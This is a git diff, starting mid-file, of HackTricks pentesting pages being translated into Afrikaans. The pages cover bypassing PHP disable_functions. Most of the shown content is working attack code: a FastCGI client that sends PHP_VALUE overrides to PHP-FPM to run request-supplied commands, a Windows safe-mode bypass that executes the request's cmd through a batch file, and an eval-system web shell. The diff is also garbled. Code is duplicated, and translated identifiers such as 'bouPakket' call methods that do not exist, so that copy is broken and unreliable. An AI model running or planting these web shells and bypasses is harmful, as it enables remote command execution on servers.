+if (!$this->_keepAlive && $this->_sock) {
+fclose($this->_sock);
+}
+}
+/**
+* Get the keep alive status
+*
+* @return Boolean true if the connection should stay alive, false otherwise
+*/
+public function getKeepAlive()
+{
+return $this->_keepAlive;
+}
+/**
+* Create a connection to the FastCGI application
+*/
+private function connect()
+{
+if (!$this->_sock) {
+//$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);
+$this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5);
+if (!$this->_sock) {
+throw new Exception('Unable to connect to FastCGI application');
+}
+}
+}
+/**
+* Build a FastCGI packet
+*
+* @param Integer $type Type of the packet
+* @param String $content Content of the packet
+* @param Integer $requestId RequestId
+*/
+private function buildPacket($type, $content, $requestId = 1)
+{
+$clen = strlen($content);
+return chr(self::VERSION_1)         /* version */
+. chr($type)                    /* type */
+. chr(($requestId >> 8) & 0xFF) /* requestIdB1 */
+. chr($requestId & 0xFF)        /* requestIdB0 */
+. chr(($clen >> 8 ) & 0xFF)     /* contentLengthB1 */
+. chr($clen & 0xFF)             /* contentLengthB0 */
+. chr(0)                        /* paddingLength */
+. chr(0)                        /* reserved */
+. $content;                     /* content */
+}
+/**
+* Build an FastCGI Name value pair
+*
+* @param String $name Name
+* @param String $value Value
+* @return String FastCGI Name value pair
+*/
+private function buildNvpair($name, $value)
+{
+$nlen = strlen($name);
+$vlen = strlen($value);
+if ($nlen < 128) {
+/* nameLengthB0 */
+$nvpair = chr($nlen);
+} else {
+/* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */
+$nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);
+}
+if ($vlen < 128) {
+/* valueLengthB0 */
+$nvpair .= chr($vlen);
+} else {
+/* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */
+$nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);
+}
+/* nameData & valueData */
+return $nvpair . $name . $value;
+}
+/**
+* Read a set of FastCGI Name value pairs
+*
+* @param String $data Data containing the set of FastCGI NVPair
+* @return array of NVPair
+*/
+private function readNvpair($data, $length = null)
+{
+$array = array();
+if ($length === null) {
+$length = strlen($data);
+}
+$p = 0;
+while ($p != $length) {
+$nlen = ord($data{$p++});
+if ($nlen >= 128) {
+$nlen = ($nlen & 0x7F << 24);
+$nlen |= (ord($data{$p++}) << 16);
+$nlen |= (ord($data{$p++}) << 8);
+$nlen |= (ord($data{$p++}));
+}
+$vlen = ord($data{$p++});
+if ($vlen >= 128) {
+$vlen = ($nlen & 0x7F << 24);
+$vlen |= (ord($data{$p++}) << 16);
+$vlen |= (ord($data{$p++}) << 8);
+$vlen |= (ord($data{$p++}));
+}
+$array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen);
+$p += ($nlen + $vlen);
+}
+return $array;
+}
+/**
+* Decode a FastCGI Packet
+*
+* @param String $data String containing all the packet
+* @return array
+*/
+private function decodePacketHeader($data)
+{
+$ret = array();
+$ret['version']       = ord($data{0});
+$ret['type']          = ord($data{1});
+$ret['requestId']     = (ord($data{2}) << 8) + ord($data{3});
+$ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5});
+$ret['paddingLength'] = ord($data{6});
+$ret['reserved']      = ord($data{7});
+return $ret;
+}
+/**
+* Read a FastCGI Packet
+*
+* @return array
+*/
+private function readPacket()
+{
+if ($packet = fread($this->_sock, self::HEADER_LEN)) {
+$resp = $this->decodePacketHeader($packet);
+$resp['content'] = '';
+if ($resp['contentLength']) {
+$len  = $resp['contentLength'];
+while ($len && $buf=fread($this->_sock, $len)) {
+$len -= strlen($buf);
+$resp['content'] .= $buf;
+}
+}
+if ($resp['paddingLength']) {
+$buf=fread($this->_sock, $resp['paddingLength']);
+}
+return $resp;
+} else {
+return false;
+}
+}
+/**
+* Get Informations on the FastCGI application
+*
+* @param array $requestedInfo information to retrieve
+* @return array
+*/
+public function getValues(array $requestedInfo)
+{
+$this->connect();
+$request = '';
+foreach ($requestedInfo as $info) {
+$request .= $this->buildNvpair($info, '');
+}
+fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0));
+$resp = $this->readPacket();
+if ($resp['type'] == self::GET_VALUES_RESULT) {
+return $this->readNvpair($resp['content'], $resp['length']);
+} else {
+throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT');
+}
+}
+/**
+* Execute a request to the FastCGI application
+*
+* @param array $params Array of parameters
+* @param String $stdin Content
+```php
+* @return String
+*/
+public function request(array $params, $stdin)
+{
+$response = '';
+$this->connect();
+$request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
+$paramsRequest = '';
+foreach ($params as $key => $value) {
+$paramsRequest .= $this->buildNvpair($key, $value);
+}
+if ($paramsRequest) {
+$request .= $this->buildPacket(self::PARAMS, $paramsRequest);
+}
+$request .= $this->buildPacket(self::PARAMS, '');
+if ($stdin) {
+$request .= $this->buildPacket(self::STDIN, $stdin);
+}
+$request .= $this->buildPacket(self::STDIN, '');
+fwrite($this->_sock, $request);
+do {
+$resp = $this->readPacket();
+if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
+$response .= $resp['content'];
+}
+} while ($resp && $resp['type'] != self::END_REQUEST);
+var_dump($resp);
+if (!is_array($resp)) {
+throw new Exception('Bad request');
+}
+switch (ord($resp['content']{4})) {
+case self::CANT_MPX_CONN:
+throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]');
+break;
+case self::OVERLOADED:
+throw new Exception('New request rejected; too busy [OVERLOADED]');
+break;
+case self::UNKNOWN_ROLE:
+throw new Exception('Role value not known [UNKNOWN_ROLE]');
+break;
+case self::REQUEST_COMPLETE:
+return $response;
+}
+}
 }
 ?>
 "; // php payload --
 $php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input";
 //$php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php";
 $params = array(
-        'GATEWAY_INTERFACE' => 'FastCGI/1.0',
-        'REQUEST_METHOD'    => 'POST',
-        'SCRIPT_FILENAME'   => $filepath,
-        'SCRIPT_NAME'       => $req,
-        'QUERY_STRING'      => 'command='.$_REQUEST['cmd'],
-        'REQUEST_URI'       => $uri,
-        'DOCUMENT_URI'      => $req,
+'GATEWAY_INTERFACE' => 'FastCGI/1.0',
+'REQUEST_METHOD'    => 'POST',
+'SCRIPT_FILENAME'   => $filepath,
+'SCRIPT_NAME'       => $req,
+'QUERY_STRING'      => 'command='.$_REQUEST['cmd'],
+'REQUEST_URI'       => $uri,
+'DOCUMENT_URI'      => $req,
 #'DOCUMENT_ROOT'     => '/',
-        'PHP_VALUE'         => $php_value,
-        'SERVER_SOFTWARE'   => '80sec/wofeiwo',
-        'REMOTE_ADDR'       => '127.0.0.1',
-        'REMOTE_PORT'       => '9985',
-        'SERVER_ADDR'       => '127.0.0.1',
-        'SERVER_PORT'       => '80',
-        'SERVER_NAME'       => 'localhost',
-        'SERVER_PROTOCOL'   => 'HTTP/1.1',
-        'CONTENT_LENGTH'    => strlen($code)
-        );
+'PHP_VALUE'         => $php_value,
+'SERVER_SOFTWARE'   => '80sec/wofeiwo',
+'REMOTE_ADDR'       => '127.0.0.1',
+'REMOTE_PORT'       => '9985',
+'SERVER_ADDR'       => '127.0.0.1',
+'SERVER_PORT'       => '80',
+'SERVER_NAME'       => 'localhost',
+'SERVER_PROTOCOL'   => 'HTTP/1.1',
+'CONTENT_LENGTH'    => strlen($code)
+);
 // print_r($_REQUEST);
 // print_r($params);
 //echo "Call: $uri\n\n";
@@ -418,44 +415,132 @@ echo $client->request($params, $code)."\n";
 ?>
 ```
 
-Using the previous function you will see that the function **`system`** is **still disabled** but **`phpinfo()`** shows a **`disable_functions`** **empty**:
+```php
+* @return String
+*/
+public function versoek(array $params, $stdin)
+{
+$response = '';
+$this->verbind();
+$versoek = $this->bouPakket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
+$paramsVersoek = '';
+foreach ($params as $sleutel => $waarde) {
+$paramsVersoek .= $this->bouNvpaar($sleutel, $waarde);
+}
+if ($paramsVersoek) {
+$versoek .= $this->bouPakket(self::PARAMS, $paramsVersoek);
+}
+$versoek .= $this->bouPakket(self::PARAMS, '');
+if ($stdin) {
+$versoek .= $this->bouPakket(self::STDIN, $stdin);
+}
+$versoek .= $this->bouPakket(self::STDIN, '');
+fwrite($this->_sock, $versoek);
+do {
+$resp = $this->leesPakket();
+if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
+$response .= $resp['content'];
+}
+} while ($resp && $resp['type'] != self::END_REQUEST);
+var_dump($resp);
+if (!is_array($resp)) {
+throw new Exception('Slegte versoek');
+}
+switch (ord($resp['content']{4})) {
+case self::CANT_MPX_CONN:
+throw new Exception('Hierdie toepassing kan nie multiplex nie [CANT_MPX_CONN]');
+break;
+case self::OVERLOADED:
+throw new Exception('Nuwe versoek afgekeur; te besig [OVERLOADED]');
+break;
+case self::UNKNOWN_ROLE:
+throw new Exception('Rolwaarde onbekend [UNKNOWN_ROLE]');
+break;
+case self::REQUEST_COMPLETE:
+return $response;
+}
+}
+}
+?>
+"; // php payload -- Doen niks nie
+$php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input";
+//$php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php";
+$params = array(
+'GATEWAY_INTERFACE' => 'FastCGI/1.0',
+'REQUEST_METHOD'    => 'POST',
+'SCRIPT_FILENAME'   => $filepath,
+'SCRIPT_NAME'       => $req,
+'QUERY_STRING'      => 'command='.$_REQUEST['cmd'],
+'REQUEST_URI'       => $uri,
+'DOCUMENT_URI'      => $req,
+#'DOCUMENT_ROOT'     => '/',
+'PHP_VALUE'         => $php_value,
+'SERVER_SOFTWARE'   => '80sec/wofeiwo',
+'REMOTE_ADDR'       => '127.0.0.1',
+'REMOTE_PORT'       => '9985',
+'SERVER_ADDR'       => '127.0.0.1',
+'SERVER_PORT'       => '80',
+'SERVER_NAME'       => 'localhost',
+'SERVER_PROTOCOL'   => 'HTTP/1.1',
+'CONTENT_LENGTH'    => strlen($code)
+);
+// print_r($_REQUEST);
+// print_r($params);
+//echo "Call: $uri\n\n";
+echo $client->versoek($params, $code)."\n";
+?>
+```
+Met behulp van die vorige funksie sal jy sien dat die funksie **`system`** steeds **gedeaktiveer** is, maar **`phpinfo()`** toon 'n **leë `disable_functions`**:
 
 ![](<../../../../.gitbook/assets/image (352).png>)
 
 ![](<../../../../.gitbook/assets/image (353).png>)
 
-**So, I think that you can only set `disable_functions` via php `.ini` config files and the PHP\_VALUE won't override that setting.**
+**So, ek dink jy kan slegs `disable_functions` instel deur middel van php `.ini`-konfigurasie lêers en die PHP\_VALUE sal nie daardie instelling oorskryf nie.**
 
 ### [**FuckFastGCI**](https://github.com/w181496/FuckFastcgi)
 
-This is a php script to exploit fastcgi protocol to bypass `open_basedir` and `disable_functions`.\
-It will help you to bypass strict `disable_functions` to RCE by loading the malicious extension.\
-You can access it here: [https://github.com/w181496/FuckFastcgi](https://github.com/w181496/FuckFastcgi) or a sligtly modified and improved version here: [https://github.com/BorelEnzo/FuckFastcgi](https://github.com/BorelEnzo/FuckFastcgi)
+Dit is 'n php-skrip om die fastcgi-protokol te misbruik om `open_basedir` en `disable_functions` te omseil.\
+Dit sal jou help om streng `disable_functions` te omseil om RCE te bereik deur die skadelike uitbreiding te laai.\
+Jy kan dit hier besoek: [https://github.com/w181496/FuckFastcgi](https://github.com/w181496/FuckFastcgi) of 'n effens gewysigde en verbeterde weergawe hier: [https://github.com/BorelEnzo/FuckFastcgi](https://github.com/BorelEnzo/FuckFastcgi)
 
-You will find that the exploit is very similar to the previous code, but instead of trying to bypass `disable_functions` using PHP\_VALUE, it tries to **load an external PHP module** to execute code using the parameters `extension_dir` and `extension` inside the variable `PHP_ADMIN_VALUE`.\
-**NOTE1**: You probably will need to **recompile** the extension with the **same PHP version that the server** is using (you can check it inside the output of phpinfo):
+Jy sal vind dat die uitbuiting baie soortgelyk is aan die vorige kode, maar in plaas daarvan om te probeer om `disable_functions` te omseil deur PHP\_VALUE te gebruik, probeer dit om 'n eksterne PHP-module te **laai** om kode uit te voer deur die parameters `extension_dir` en `extension` binne die veranderlike `PHP_ADMIN_VALUE`.\
+**NOTA1**: Jy sal waarskynlik die uitbreiding met dieselfde PHP-weergawe as die bediener **moet herkompilieer** (jy kan dit binne die uitset van phpinfo nagaan):
 
 ![](<../../../../.gitbook/assets/image (354).png>)
 
 {% hint style="danger" %}
-**NOTE2**: I managed to make this work by inserting the `extension_dir` and `extension` values inside a PHP `.ini` config file (something that you won't be able to do attacking a server). But for some reason, when using this exploit and loading the extension from the `PHP_ADMIN_VALUE` variable the process just died, so I don't know if this technique is still valid.
+**NOTA2**: Ek het daarin geslaag om dit te laat werk deur die `extension_dir` en `extension` waardes binne 'n PHP `.ini`-konfigurasie lêer in te voeg (iets wat jy nie sal kan doen om 'n bediener aan te val nie). Maar om een of ander rede, wanneer jy hierdie uitbuiting gebruik en die uitbreiding van die `PHP_ADMIN_VALUE`-veranderlike laai, sterf die proses net, so ek weet nie of hierdie tegniek nog geldig is nie.
 {% endhint %}
 
 ### PHP-FPM Remote Code Execution Vulnerability (CVE-2019–11043)
 
-You can exploit this vulnerability with [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) and test is using this docker environment: [https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043).\
-You can also find an analysis of the vulnerability [**here**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**.**
+Jy kan hierdie kwesbaarheid uitbuit met [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) en dit toets met hierdie docker-omgewing: [https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043).\
+Jy kan ook 'n ontleding van die kwesbaarheid vind [**hier**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**.**
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md
index dad169320..03df5722f 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md
@@ -1,23 +1,21 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 
-# PHP <= 5.2.9 on windows
+# PHP <= 5.2.9 op Windows
 
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
+Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
 
 {% tabs %}
 {% tab title="exploit.php" %}
@@ -25,42 +23,42 @@ From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog
 abysssec.txt"."\r\n");
-	fwrite($batch,"exit");
-	fclose($batch);
-	exec("\start cmd.bat");
-	echo "
";
-	echo "
Abysssec.com PHP <= 5.2.9 SafeMod Bypasser
";
-	echo "";
-	echo "
";
-	}
+$cmd = $_REQUEST['cmd'];
+if ($cmd){
+$batch = fopen ("cmd.bat","w");
+fwrite($batch,"$cmd>abysssec.txt"."\r\n");
+fwrite($batch,"exit");
+fclose($batch);
+exec("\start cmd.bat");
+echo "
";
+echo "
Abysssec.com PHP <= 5.2.9 SafeMod Bypasser
";
+echo "";
+echo "
";
+}
 ?>
 
 
@@ -74,8 +72,6 @@ From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog
 
 
 ```
-{% endtab %}
-
 {% tab title="cmd.bat" %}
 ```
 dir > abyss.txt
@@ -88,16 +84,14 @@ exit
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md
index b42671c21..0129f9600 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md
@@ -1,27 +1,24 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
-# PHP Perl Extension Safe\_mode Bypass Exploit
-
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
+# PHP Perl-uitbreiding Safe\_mode Bypass Exploit
 
+Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
 ```php
 eval("system('".$_GET['cmd']."')");
 echo "</textarea>";
 $_GET['cmd']=htmlspecialchars($_GET['cmd']);
 echo "
CMD: 
"
- 
+
 ?>
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md
index 502a57324..29b89ad19 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md
@@ -1,28 +1,25 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
